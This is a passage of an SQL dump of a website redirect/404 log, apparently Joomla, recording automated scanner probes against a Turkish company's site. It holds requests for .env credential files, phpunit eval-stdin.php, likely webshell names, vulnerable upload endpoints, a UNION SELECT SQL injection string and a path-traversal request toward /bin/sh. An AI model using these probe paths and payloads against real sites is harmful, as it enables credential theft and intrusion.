00:00:00',301),(31025,'https://3s-technologies.com.tr/tr/laravel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2022-11-14 08:48:11','0000-00-00 00:00:00',301),(31026,'https://3s-technologies.com.tr/tr/laravel52/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2022-11-14 08:48:12','0000-00-00 00:00:00',301),(31027,'https://3s-technologies.com.tr/tr/lib/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2022-11-14 08:48:13','0000-00-00 00:00:00',301),(31028,'https://3s-technologies.com.tr/tr/zend/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2022-11-14 08:48:14','0000-00-00 00:00:00',301),(31029,'http://www.3s-technologies.com.tr/en/home2/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',1,0,'2022-11-14 23:35:16','0000-00-00 00:00:00',301),(31030,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com','',2,0,'2022-11-15 12:25:04','0000-00-00 00:00:00',301),(31031,'http://3s-technologies.com.tr/ueditor/net/controller.ashx?action=catchimage',NULL,'http://3s-technologies.com.tr/Ueditor/net/controller.ashx?action=catchimage','',1,0,'2022-11-17 06:43:01','0000-00-00 00:00:00',301),(31032,'http://3s-technologies.com.tr/ueditor/controller.ashx?action=catchimage',NULL,'http://3s-technologies.com.tr/Ueditor/controller.ashx?action=catchimage','',1,0,'2022-11-17 06:43:14','0000-00-00 00:00:00',301),(31033,'http://www.3s-technologies.com.tr/tr/adadaddadad',NULL,'','',1,0,'2022-11-17 14:47:33','0000-00-00 00:00:00',301),(31034,'https://www.3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',11,0,'2022-11-17 21:21:03','0000-00-00 00:00:00',301),(31035,'https://3s-technologies.com.tr/js/js.php',NULL,'','',3,0,'2022-11-17 22:19:34','0000-00-00 00:00:00',301),(31036,'https://3s-technologies.com.tr/en/strings-xml.php',NULL,'','',3,0,'2022-11-17 22:46:27','0000-00-00 00:00:00',301),(31037,'https://3s-technologies.com.tr/en/cong.php',NULL,'','',14,0,'2022-11-17 23:12:25','0000-00-00 00:00:00',301),(31038,'https://3s-technologies.com.tr/catalog/catalog.php',NULL,'','',3,0,'2022-11-18 00:15:41','0000-00-00 00:00:00',301),(31039,'http://3s-technologies.com.tr/tr/2022',NULL,'http://3s-technologies.com.tr/2022','',16,0,'2022-11-18 22:47:12','0000-00-00 00:00:00',301),(31040,'https://3s-technologies.com.tr/en/aluminyum-i?leme-aluminum-processing',NULL,'','',8,0,'2022-11-19 14:02:53','0000-00-00 00:00:00',301),(31041,'https://3s-technologies.com.tr/wp-task.php',NULL,'','',3,0,'2022-11-19 21:00:37','0000-00-00 00:00:00',301),(31042,'https://3s-technologies.com.tr/en/wp-plugiin.php',NULL,'','',3,0,'2022-11-19 21:01:12','0000-00-00 00:00:00',301),(31043,'https://3s-technologies.com.tr/assets/images/s_noeval.php',NULL,'','',3,0,'2022-11-19 22:11:59','0000-00-00 00:00:00',301),(31044,'https://3s-technologies.com.tr/en/admin/controller/extension/module/accesson.php',NULL,'','',3,0,'2022-11-20 00:14:56','0000-00-00 00:00:00',301),(31045,'https://3s-technologies.com.tr/en/admin/controller/extension/module/ups.php',NULL,'','',3,0,'2022-11-20 00:46:14','0000-00-00 00:00:00',301),(31046,'https://3s-technologies.com.tr/wp-cast.php',NULL,'','',3,0,'2022-11-20 00:51:44','0000-00-00 00:00:00',301),(31047,'http://3s-technologies.com.tr/tr/3s-technologies.com.tr/.env',NULL,'','',134,0,'2022-11-20 09:52:12','0000-00-00 00:00:00',301),(31048,'https://3s-technologies.com.tr/tr/3s-technologies.com.tr/.env',NULL,'','',136,0,'2022-11-20 09:52:13','0000-00-00 00:00:00',301),(31049,'http://3s-technologies.com.tr/tr/vendor/.env',NULL,'','',4,0,'2022-11-20 09:52:14','0000-00-00 00:00:00',301),(31050,'https://3s-technologies.com.tr/tr/vendor/.env',NULL,'','',22,0,'2022-11-20 09:52:15','0000-00-00 00:00:00',301),(31051,'https://3s-technologies.com.tr/tr/admin/.env',NULL,'','',44,0,'2022-11-20 09:52:18','0000-00-00 00:00:00',301),(31052,'http://3s-technologies.com.tr/tr/blog/.env',NULL,'','',4,0,'2022-11-20 09:52:21','0000-00-00 00:00:00',301),(31053,'https://3s-technologies.com.tr/tr/blog/.env',NULL,'','',6,0,'2022-11-20 09:52:22','0000-00-00 00:00:00',301),(31054,'https://3s-technologies.com.tr/tr/laravel/.env',NULL,'','',34,0,'2022-11-20 09:52:25','0000-00-00 00:00:00',301),(31055,'http://3s-technologies.com.tr/tr/dev/.env',NULL,'','',7,0,'2022-11-20 09:52:29','0000-00-00 00:00:00',301),(31056,'https://3s-technologies.com.tr/tr/dev/.env',NULL,'','',16,0,'2022-11-20 09:52:29','0000-00-00 00:00:00',301),(31057,'http://3s-technologies.com.tr/tr/test/.env',NULL,'','',4,0,'2022-11-20 09:52:32','0000-00-00 00:00:00',301),(31058,'https://3s-technologies.com.tr/tr/test/.env',NULL,'','',3,0,'2022-11-20 09:52:32','0000-00-00 00:00:00',301),(31059,'http://3s-technologies.com.tr/tr/portal/.env',NULL,'','',2,0,'2022-11-20 09:52:35','0000-00-00 00:00:00',301),(31060,'https://3s-technologies.com.tr/tr/portal/.env',NULL,'','',9,0,'2022-11-20 09:52:36','0000-00-00 00:00:00',301),(31061,'http://3s-technologies.com.tr/tr/project/.env',NULL,'','',4,0,'2022-11-20 09:52:38','0000-00-00 00:00:00',301),(31062,'https://3s-technologies.com.tr/tr/project/.env',NULL,'','',8,0,'2022-11-20 09:52:39','0000-00-00 00:00:00',301),(31063,'http://3s-technologies.com.tr/tr/assets/.env',NULL,'','',2,0,'2022-11-20 09:52:42','0000-00-00 00:00:00',301),(31064,'https://3s-technologies.com.tr/tr/assets/.env',NULL,'','',10,0,'2022-11-20 09:52:43','0000-00-00 00:00:00',301),(31065,'http://3s-technologies.com.tr/tr/shop/.env',NULL,'','',5,0,'2022-11-20 09:52:45','0000-00-00 00:00:00',301),(31066,'https://3s-technologies.com.tr/tr/shop/.env',NULL,'','',12,0,'2022-11-20 09:52:46','0000-00-00 00:00:00',301),(31067,'http://3s-technologies.com.tr/tr/dashboard/.env',NULL,'','',5,0,'2022-11-20 09:52:49','0000-00-00 00:00:00',301),(31068,'https://3s-technologies.com.tr/tr/dashboard/.env',NULL,'','',13,0,'2022-11-20 09:52:50','0000-00-00 00:00:00',301),(31069,'https://3s-technologies.com.tr/tr/public/.env',NULL,'','',22,0,'2022-11-20 09:52:54','0000-00-00 00:00:00',301),(31070,'http://3s-technologies.com.tr/tr/app/.env',NULL,'','',16,0,'2022-11-20 09:52:56','0000-00-00 00:00:00',301),(31071,'https://3s-technologies.com.tr/tr/app/.env',NULL,'','',39,0,'2022-11-20 09:52:57','0000-00-00 00:00:00',301),(31072,'http://3s-technologies.com.tr/tr/production/.env',NULL,'','',5,0,'2022-11-20 09:52:59','0000-00-00 00:00:00',301),(31073,'https://3s-technologies.com.tr/tr/production/.env',NULL,'','',5,0,'2022-11-20 09:53:00','0000-00-00 00:00:00',301),(31074,'http://3s-technologies.com.tr/tr/sites/all/libraries/mailchimp/.env',NULL,'','',3,0,'2022-11-20 09:53:02','0000-00-00 00:00:00',301),(31075,'https://3s-technologies.com.tr/tr/sites/all/libraries/mailchimp/.env',NULL,'','',5,0,'2022-11-20 09:53:03','0000-00-00 00:00:00',301),(31076,'http://3s-technologies.com.tr/tr/www/.env',NULL,'','',5,0,'2022-11-20 09:53:07','0000-00-00 00:00:00',301),(31077,'https://3s-technologies.com.tr/tr/www/.env',NULL,'','',13,0,'2022-11-20 09:53:08','0000-00-00 00:00:00',301),(31078,'http://3s-technologies.com.tr/tr/protected/.env',NULL,'','',5,0,'2022-11-20 09:53:11','0000-00-00 00:00:00',301),(31079,'https://3s-technologies.com.tr/tr/protected/.env',NULL,'','',6,0,'2022-11-20 09:53:12','0000-00-00 00:00:00',301),(31080,'http://3s-technologies.com.tr/tr/core/.env',NULL,'','',17,0,'2022-11-20 09:53:14','0000-00-00 00:00:00',301),(31081,'https://3s-technologies.com.tr/tr/core/.env',NULL,'','',33,0,'2022-11-20 09:53:15','0000-00-00 00:00:00',301),(31082,'http://3s-technologies.com.tr/tr/base/.env',NULL,'','',5,0,'2022-11-20 09:53:18','0000-00-00 00:00:00',301),(31083,'https://3s-technologies.com.tr/tr/base/.env',NULL,'','',5,0,'2022-11-20 09:53:19','0000-00-00 00:00:00',301),(31084,'http://3s-technologies.com.tr/tr/src/.env',NULL,'','',8,0,'2022-11-20 09:53:22','0000-00-00 00:00:00',301),(31085,'https://3s-technologies.com.tr/tr/src/.env',NULL,'','',12,0,'2022-11-20 09:53:23','0000-00-00 00:00:00',301),(31086,'http://3s-technologies.com.tr/tr/cgi-bin/.env',NULL,'','',2,0,'2022-11-20 09:53:25','0000-00-00 00:00:00',301),(31087,'http://3s-technologies.com.tr/tr/apps/.env',NULL,'','',7,0,'2022-11-20 09:53:28','0000-00-00 00:00:00',301),(31088,'https://3s-technologies.com.tr/tr/apps/.env',NULL,'','',14,0,'2022-11-20 09:53:29','0000-00-00 00:00:00',301),(31089,'http://3s-technologies.com.tr/tr/wp-content/.env',NULL,'','',6,0,'2022-11-20 09:53:31','0000-00-00 00:00:00',301),(31090,'https://3s-technologies.com.tr/tr/wp-content/.env',NULL,'','',16,0,'2022-11-20 09:53:33','0000-00-00 00:00:00',301),(31091,'http://3s-technologies.com.tr/tr/wp-admin/.env',NULL,'','',6,0,'2022-11-20 09:53:35','0000-00-00 00:00:00',301),(31092,'https://3s-technologies.com.tr/tr/wp-admin/.env',NULL,'','',6,0,'2022-11-20 09:53:36','0000-00-00 00:00:00',301),(31093,'http://3s-technologies.com.tr/tr/library/.env',NULL,'','',5,0,'2022-11-20 09:53:38','0000-00-00 00:00:00',301),(31094,'https://3s-technologies.com.tr/tr/library/.env',NULL,'','',15,0,'2022-11-20 09:53:39','0000-00-00 00:00:00',301),(31095,'http://3s-technologies.com.tr/tr/new/.env',NULL,'','',8,0,'2022-11-20 09:53:41','0000-00-00 00:00:00',301),(31096,'https://3s-technologies.com.tr/tr/new/.env',NULL,'','',8,0,'2022-11-20 09:53:42','0000-00-00 00:00:00',301),(31097,'http://3s-technologies.com.tr/tr/old/.env',NULL,'','',8,0,'2022-11-20 09:53:44','0000-00-00 00:00:00',301),(31098,'https://3s-technologies.com.tr/tr/old/.env',NULL,'','',15,0,'2022-11-20 09:53:45','0000-00-00 00:00:00',301),(31099,'http://3s-technologies.com.tr/tr/local/.env',NULL,'','',5,0,'2022-11-20 09:53:48','0000-00-00 00:00:00',301),(31100,'https://3s-technologies.com.tr/tr/local/.env',NULL,'','',9,0,'2022-11-20 09:53:49','0000-00-00 00:00:00',301),(31101,'http://3s-technologies.com.tr/tr/crm/.env',NULL,'','',5,0,'2022-11-20 09:53:51','0000-00-00 00:00:00',301),(31102,'https://3s-technologies.com.tr/tr/crm/.env',NULL,'','',12,0,'2022-11-20 09:53:52','0000-00-00 00:00:00',301),(31103,'http://3s-technologies.com.tr/tr/audio/.env',NULL,'','',5,0,'2022-11-20 09:53:54','0000-00-00 00:00:00',301),(31104,'https://3s-technologies.com.tr/tr/audio/.env',NULL,'','',5,0,'2022-11-20 09:53:55','0000-00-00 00:00:00',301),(31105,'http://3s-technologies.com.tr/tr/app/config/.env',NULL,'','',6,0,'2022-11-20 09:53:57','0000-00-00 00:00:00',301),(31106,'https://3s-technologies.com.tr/tr/app/config/.env',NULL,'','',6,0,'2022-11-20 09:53:58','0000-00-00 00:00:00',301),(31107,'http://3s-technologies.com.tr/tr/api/.env',NULL,'','',24,0,'2022-11-20 09:54:01','0000-00-00 00:00:00',301),(31108,'https://3s-technologies.com.tr/tr/api/.env',NULL,'','',50,0,'2022-11-20 09:54:01','0000-00-00 00:00:00',301),(31109,'http://3s-technologies.com.tr/tr/conf/.env',NULL,'','',4,0,'2022-11-20 09:54:03','0000-00-00 00:00:00',301),(31110,'https://3s-technologies.com.tr/tr/conf/.env',NULL,'','',7,0,'2022-11-20 09:54:04','0000-00-00 00:00:00',301),(31111,'http://3s-technologies.com.tr/tr/database/.env',NULL,'','',8,0,'2022-11-20 09:54:07','0000-00-00 00:00:00',301),(31112,'https://3s-technologies.com.tr/tr/database/.env',NULL,'','',14,0,'2022-11-20 09:54:08','0000-00-00 00:00:00',301),(31113,'http://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/mar.php',NULL,'www.google.com','',9,0,'2022-11-20 09:57:13','0000-00-00 00:00:00',301),(31114,'https://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/mar.php',NULL,'www.google.com','',8,0,'2022-11-20 09:57:14','0000-00-00 00:00:00',301),(31115,'https://www.3s-technologies.com.tr/tr/test.php.gif',NULL,'','',2,0,'2022-11-21 00:23:56','0000-00-00 00:00:00',301),(31116,'https://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/test.php.j',NULL,'','',3,0,'2022-11-21 00:24:00','0000-00-00 00:00:00',301),(31117,'https://www.3s-technologies.com.tr/components/com_creativecontactform/fileupload/index.php',NULL,'','',3,0,'2022-11-21 00:24:01','0000-00-00 00:00:00',301),(31118,'https://www.3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',3,0,'2022-11-21 00:24:03','0000-00-00 00:00:00',301),(31119,'https://www.3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php',NULL,'','',3,0,'2022-11-21 00:24:03','0000-00-00 00:00:00',301),(31120,'https://www.3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',3,0,'2022-11-21 00:24:05','0000-00-00 00:00:00',301),(31121,'https://www.3s-technologies.com.tr/tr/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',3,0,'2022-11-21 00:24:08','0000-00-00 00:00:00',301),(31122,'http://www.3s-technologies.com.tr/tr/test.php.gif',NULL,'','',3,0,'2022-11-21 00:24:10','0000-00-00 00:00:00',301),(31123,'https://www.3s-technologies.com.tr/tr/tmp/plupload/test.php',NULL,'','',3,0,'2022-11-21 00:24:10','0000-00-00 00:00:00',301),(31124,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/test.php.j',NULL,'','',3,0,'2022-11-21 00:24:11','0000-00-00 00:00:00',301),(31125,'http://www.3s-technologies.com.tr/components/com_creativecontactform/fileupload/index.php',NULL,'','',3,0,'2022-11-21 00:24:12','0000-00-00 00:00:00',301),(31126,'http://www.3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',3,0,'2022-11-21 00:24:13','0000-00-00 00:00:00',301),(31127,'http://www.3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php',NULL,'','',3,0,'2022-11-21 00:24:13','0000-00-00 00:00:00',301),(31128,'http://www.3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',3,0,'2022-11-21 00:24:14','0000-00-00 00:00:00',301),(31129,'http://www.3s-technologies.com.tr/tr/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',3,0,'2022-11-21 00:24:16','0000-00-00 00:00:00',301),(31130,'http://www.3s-technologies.com.tr/tr/tmp/plupload/test.php',NULL,'','',3,0,'2022-11-21 00:24:17','0000-00-00 00:00:00',301),(31131,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?com_user+itemid=35&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',1,0,'2022-11-21 00:24:18','0000-00-00 00:00:00',301),(31132,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/test.php.gif',NULL,'','',1,0,'2022-11-21 00:24:20','0000-00-00 00:00:00',301),(31133,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-11-21 00:24:21','0000-00-00 00:00:00',301),(31134,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-11-21 00:24:22','0000-00-00 00:00:00',301),(31135,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-11-21 00:24:23','0000-00-00 00:00:00',301),(31136,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-11-21 00:24:25','0000-00-00 00:00:00',301),(31137,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-11-21 00:24:26','0000-00-00 00:00:00',301),(31138,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-11-21 00:24:28','0000-00-00 00:00:00',301),(31139,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-11-21 00:24:29','0000-00-00 00:00:00',301),(31140,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-11-21 00:24:31','0000-00-00 00:00:00',301),(31141,'http://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?com_user+itemid=35&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',1,0,'2022-11-21 00:24:32','0000-00-00 00:00:00',301),(31142,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/test.php.gif',NULL,'','',2,0,'2022-11-21 00:24:33','0000-00-00 00:00:00',301),(31143,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-11-21 00:24:33','0000-00-00 00:00:00',301),(31144,'http://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2022-11-21 00:24:33','0000-00-00 00:00:00',301),(31145,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/jdownloads/screenshots/test.php.j',NULL,'','',2,0,'2022-11-21 00:24:34','0000-00-00 00:00:00',301),(31146,'http://www.3s-technologies.com.tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',2,0,'2022-11-21 00:24:35','0000-00-00 00:00:00',301),(31147,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',2,0,'2022-11-21 00:24:36','0000-00-00 00:00:00',301),(31148,'http://www.3s-technologies.com.tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',2,0,'2022-11-21 00:24:36','0000-00-00 00:00:00',301),(31149,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',2,0,'2022-11-21 00:24:37','0000-00-00 00:00:00',301),(31150,'http://www.3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2022-11-21 00:24:37','0000-00-00 00:00:00',301),(31151,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',2,0,'2022-11-21 00:24:38','0000-00-00 00:00:00',301),(31152,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/tmp/plupload/test.php',NULL,'','',2,0,'2022-11-21 00:24:39','0000-00-00 00:00:00',301),(31153,'https://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?com_user+itemid=35&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',1,0,'2022-11-21 00:25:18','0000-00-00 00:00:00',301),(31154,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/test.php.gif',NULL,'','',1,0,'2022-11-21 00:25:20','0000-00-00 00:00:00',301),(31155,'https://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-11-21 00:25:21','0000-00-00 00:00:00',301),(31156,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-11-21 00:25:23','0000-00-00 00:00:00',301),(31157,'https://3s-technologies.com.tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-11-21 00:25:23','0000-00-00 00:00:00',301),(31158,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-11-21 00:25:25','0000-00-00 00:00:00',301),(31159,'https://3s-technologies.com.tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-11-21 00:25:26','0000-00-00 00:00:00',301),(31160,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-11-21 00:25:28','0000-00-00 00:00:00',301),(31161,'https://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-11-21 00:25:29','0000-00-00 00:00:00',301),(31162,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-11-21 00:25:31','0000-00-00 00:00:00',301),(31163,'http://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?com_user+itemid=35&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',1,0,'2022-11-21 00:25:32','0000-00-00 00:00:00',301),(31164,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/test.php.gif',NULL,'','',2,0,'2022-11-21 00:25:33','0000-00-00 00:00:00',301),(31165,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-11-21 00:25:33','0000-00-00 00:00:00',301),(31166,'http://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2022-11-21 00:25:33','0000-00-00 00:00:00',301),(31167,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/jdownloads/screenshots/test.php.j',NULL,'','',2,0,'2022-11-21 00:25:34','0000-00-00 00:00:00',301),(31168,'http://3s-technologies.com.tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',2,0,'2022-11-21 00:25:35','0000-00-00 00:00:00',301),(31169,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',2,0,'2022-11-21 00:25:36','0000-00-00 00:00:00',301),(31170,'http://3s-technologies.com.tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',2,0,'2022-11-21 00:25:36','0000-00-00 00:00:00',301),(31171,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',2,0,'2022-11-21 00:25:37','0000-00-00 00:00:00',301),(31172,'http://3s-technologies.com.tr/images/stories/virtuemart/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2022-11-21 00:25:37','0000-00-00 00:00:00',301),(31173,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',2,0,'2022-11-21 00:25:38','0000-00-00 00:00:00',301),(31174,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/tmp/plupload/test.php',NULL,'','',2,0,'2022-11-21 00:25:39','0000-00-00 00:00:00',301),(31175,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/cs40-detail',NULL,'','',3,0,'2022-11-23 23:02:07','0000-00-00 00:00:00',301),(31176,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/ls60v-detail',NULL,'','',3,0,'2022-11-24 02:39:44','0000-00-00 00:00:00',301),(31177,'http://3s-technologies.com.tr/tr/contract.php',NULL,'http://3s-technologies.com.tr/contract.php','',2,0,'2022-11-25 02:15:29','0000-00-00 00:00:00',301),(31178,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com',NULL,'','',1,0,'2022-11-25 02:26:22','0000-00-00 00:00:00',301),(31179,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com\'[0]',NULL,'','',2,0,'2022-11-25 02:26:23','0000-00-00 00:00:00',301),(31180,'https://3s-technologies.com.tr/apply.cgi',NULL,'','',1,0,'2022-11-26 12:12:25','0000-00-00 00:00:00',301),(31181,'https://3s-technologies.com.tr/admin/asign-single-student-subjects.php',NULL,'','',1,0,'2022-11-26 12:12:26','0000-00-00 00:00:00',301),(31182,'https://3s-technologies.com.tr//cobbler_api',NULL,'','',2,0,'2022-11-26 12:12:29','0000-00-00 00:00:00',301),(31183,'https://3s-technologies.com.tr/getcfg.php',NULL,'','',1,0,'2022-11-26 12:12:30','0000-00-00 00:00:00',301),(31184,'https://3s-technologies.com.tr/hms/admin/',NULL,'','',1,0,'2022-11-26 12:12:31','0000-00-00 00:00:00',301),(31185,'https://3s-technologies.com.tr/.\r./.\r./.\r./.\r./bin/sh',NULL,'','',1,0,'2022-11-26 12:12:36','0000-00-00 00:00:00',301),(31186,'https://3s-technologies.com.tr/side.php',NULL,'','',1,0,'2022-11-26 12:12:36','0000-00-00 00:00:00',301),(31187,'https://3s-technologies.com.tr/ztp/cgi-bin/handler',NULL,'','',1,0,'2022-11-26 12:12:37','0000-00-00 00:00:00',301),(31188,'https://3s-technologies.com.tr/viewlog.jsp',NULL,'','',1,0,'2022-11-26 12:12:37','0000-00-00 00:00:00',301),(31189,'https://3s-technologies.com.tr/functionrouter',NULL,'','',1,0,'2022-11-26 12:12:37','0000-00-00 00:00:00',301),(31190,'https://3s-technologies.com.tr/casa/nodes/thumbprints',NULL,'','',2,0,'2022-11-26 12:12:39','0000-00-00 00:00:00',301),(31191,'https://3s-technologies.com.tr/en/users/sign_in',NULL,'https://3s-technologies.com.tr/users/sign_in','',2,0,'2022-11-26 12:12:39','0000-00-00 00:00:00',301),(31192,'https://3s-technologies.com.tr/en/microstrategyws/happyaxis.jsp',NULL,'https://3s-technologies.com.tr/MicroStrategyWS/happyaxis.jsp','',1,0,'2022-11-26 12:12:49','0000-00-00 00:00:00',301),(31193,'https://3s-technologies.com.tr/assets/php/upload.php',NULL,'http://3s-technologies.com.tr','',1,0,'2022-11-26 12:47:57','0000-00-00 00:00:00',301),(31194,'https://3s-technologies.com.tr/api/content/',NULL,'','',1,0,'2022-11-26 12:47:58','0000-00-00 00:00:00',301),(31195,'https://3s-technologies.com.tr/apisix/batch-requests',NULL,'','',1,0,'2022-11-26 12:48:02','0000-00-00 00:00:00',301),(31196,'https://3s-technologies.com.tr/en/docpicker/internal_proxy/http/interact.sh',NULL,'https://3s-technologies.com.tr/docpicker/internal_proxy/http/interact.sh','',1,0,'2022-11-26 12:48:04','0000-00-00 00:00:00',301),(31197,'https://3s-technologies.com.tr/nacos/v1/cs/configs?dataid=nacos.cfg.dataidfoo&group=foo&content=helloworld',NULL,'','',2,0,'2022-11-26 12:48:05','0000-00-00 00:00:00',301),(31198,'https://3s-technologies.com.tr/account',NULL,'','',2,0,'2022-11-26 12:48:05','0000-00-00 00:00:00',301),(31199,'https://3s-technologies.com.tr/tr/admin/view_car.php?id=-1 union select 1,md5(999999999),3,4,5,6,7,8,9,10--+',NULL,'https://3s-technologies.com.tr/admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+','',1,0,'2022-11-26 12:48:14','0000-00-00 00:00:00',301),(31200,'https://3s-technologies.com.tr/en/wps/pa_wcm_authoring_ui/proxy/http/interact.sh',NULL,'https://3s-technologies.com.tr/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh','',1,0,'2022-11-26 12:48:19','0000-00-00 00:00:00',301),(31201,'https://3s-technologies.com.tr/wp-json/click5_sitemap/api/update_html_option_ajax',NULL,'','',3,0,'2022-11-26 13:24:10','0000-00-00 00:00:00',301),(31202,'https://3s-technologies.com.tr/tr/?option=com',NULL,'https://3s-technologies.com.tr/index.php?option=com','',1,0,'2022-11-28 07:00:03','0000-00-00 00:00:00',301),(31203,'https://3s-technologies.com.tr/tr/?option=com\'nvopzp; and 1=1 or (<\'\">iko)),',NULL,'https://3s-technologies.com.tr/index.php?option=com%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),','',1,0,'2022-11-28 07:00:04','0000-00-00 00:00:00',301),(31204,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'','',4,0,'2022-11-30 17:28:05','0000-00-00 00:00:00',301),(31205,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',20,0,'2022-11-30 21:51:08','0000-00-00 00:00:00',301),(31206,'http://3s-technologies.com.tr/tr/abc.php',NULL,'','',97,0,'2022-12-01 11:50:58','0000-00-00 00:00:00',301),(31207,'http://3s-technologies.com.tr/tr/ninja.php',NULL,'','',11,0,'2022-12-01 11:51:02','0000-00-00 00:00:00',301),(31208,'http://3s-technologies.com.tr/tr/in.php',NULL,'','',59,0,'2022-12-01 11:51:02','0000-00-00 